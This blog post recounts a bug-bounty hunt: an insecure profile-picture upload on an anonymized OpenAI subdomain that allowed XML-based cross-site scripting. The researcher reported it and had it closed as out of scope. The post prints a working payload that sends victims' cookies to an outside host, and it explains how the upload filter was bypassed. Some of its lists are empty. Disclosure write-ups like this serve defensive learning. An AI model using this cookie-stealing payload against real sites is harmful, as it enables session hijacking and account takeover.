Hunting XSS in OpenAI: An Insecure File Upload Adventure Marked Out of Scope

By Deev/techycodec08, September 06, 2024

Introduction

Back in September 2024, I set out to explore the security of OpenAI’s ecosystem, a platform synonymous with cutting-edge AI innovation.

Bug Explanation Diagram

What I uncovered was a fascinating vulnerability: Insecure File Upload leading to Reflected Cross-Site Scripting (XSS) on a subdomain tied to subdomain.openai.org.

Bug Explanation Diagram

I reported it through Bugcrowd on September 6, 2024, only to have it marked as Out of Scope (OOS) and deemed “not applicable” for a reward.

Bug Explanation Diagram

While I can’t disclose specifics due to OpenAI’s policy, I’m thrilled to share the anonymized journey of this discovery—how I found it, why it mattered, and what it taught me about bug hunting.

The Bug at a Glance

The vulnerability I identified was a Reflected XSS (Non-Self) stemming from an insecure file upload feature. In essence, I could upload a malicious XML file disguised as a profile picture, which, when accessed via a crafted URL, executed arbitrary JavaScript in another user’s browser under the subdomain.openai.org domain.

Bug Explanation Diagram

This opened the door to stealing session cookies, including CSRF tokens, and potentially escalating to more severe attacks like account takeover.

Bug Explanation Diagram

While it didn’t earn a bounty or public disclosure, the process was a goldmine of learning. Here’s how it unfolded.

The Setup: A Profile Picture Gone Rogue

The adventure began on subdomain.openai.com, a subdomain that redirected me to a different subdomain named subdomain.openai.org after login. This site, likely used for managing projects, offered a feature: the ability to upload a profile picture in the “My Account” settings.

File uploads are a classic attack vector, so I decided to poke around.

Bug Explanation Diagram

The upload process was straightforward—select an image, submit, and it’s stored on the server. But what caught my eye was the lack of strict validation on the file type and content. Time to break out Burp Suite and see what I could get away with.

The Discovery Process

Step 1: Intercepting the Upload

I started by uploading a legitimate image and intercepting the request with Burp.

Bug Explanation Diagram

The file was sent as a Base64-encoded blob, with a Content-Type of image/*. The server accepted it, returned a success response, and provided a URL to the uploaded file under /media/someDirectory/.

So far, standard behavior.

Bug Explanation Diagram

But what if I swapped the image for something more interesting? I crafted a simple XML file containing an XSS payload:

<html>
	<head></head>
	<body>
		<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(document.location="https://mydomain.com/?c="+document.cookie)</something:script>
	</body>
</html>
        
Bug Explanation Diagram

The payload, alert(document.location="http://0.0.0.0:8888.com/?c="+document.cookie), would:

I Base64-encoded the XML, changed the Content-Type to text/xml, and sent it through the upload endpoint. To my delight, the server accepted it without complaint, storing it at a predictable path like:

https://subdomain.openai.org/media/someDirectory/128703680/profile/rzv3TsxXnnZhR85nzKxMcZz97hcnCx5HzwVgVWMkFqDG8XH69z.xml
        
Bug Explanation Diagram

Step 2: Triggering the XSS

Next, I sent a GET request to the uploaded file’s URL. The server parsed the XML and rendered it as a webpage.

But would the JavaScript execute? To test this, I opened a private browser window, logged in as a second user, and visited the same URL. Sure enough, the alert popped up, and my Python server logged a request with the victim’s cookies.

Bug Explanation Diagram
Bug Explanation Diagram

The CSRF token and Session ID matched the victim’s session cookies, proving the XSS was real and exploitable. I had a working proof-of-concept: a crafted URL that, when visited, executed arbitrary JavaScript in the context of subdomain.openai.org.

The Impact: A Window into Exploitation

This wasn’t just a harmless alert. Reflected XSS of this nature carries serious risks:

From a business perspective, this could erode trust in OpenAI’s platform, especially if attackers targeted high-profile users. The ability to disguise the malicious URL and trick users into clicking it made it particularly insidious.

Assessing the Severity: My CVSS Score

To quantify the severity, I’d assign this vulnerability a CVSS v3.1 score of 5.7 (Medium). Here’s the breakdown:

Bug Explanation Diagram

Reporting and the OOS Verdict

I submitted the bug to OpenAI via Bugcrowd on September 6, 2024, at 18:29:18 UTC, targeting *.openai.org under the API Testing category. My report included detailed steps, screenshots, and a clear PoC. I suggested a P3 priority based on the VRT for Reflected XSS (Non-Self), given its moderate severity.

Three days later, on September 9, 2024, OpenAI closed the submission as “Not Applicable,” marking it OOS. No reward, no further explanation beyond the standard notice. While disappointing, I suspect it was due to subdomain.openai.org being a third-party service not fully under OpenAI’s bounty scope.

Bug Explanation Diagram

The engagement’s “no disclosure” policy also means I can’t share the raw details publicly, but I can still reflect on the experience.

Lessons Learned

This hunt taught me a few valuable lessons:

For developers, this is a reminder to sanitize uploads rigorously—check file types, strip executable content, and avoid rendering user-controlled files directly. For bug hunters, it’s a nudge to clarify scope upfront, especially with subdomains.

Final Thoughts

Though this XSS didn’t land a bounty or a fix (that I know of), it was a thrilling dive into OpenAI’s ecosystem. Uncovering a path from an innocent profile picture to a cookie-stealing payload felt like cracking a puzzle—one that could’ve had real-world bite in the right hands.

I respect OpenAI’s call on scope and their no-disclosure stance, but I hope this anonymized tale inspires fellow hunters to keep probing the edges of the digital frontier.

HAPPY HUNTING!!!!

Connect with Me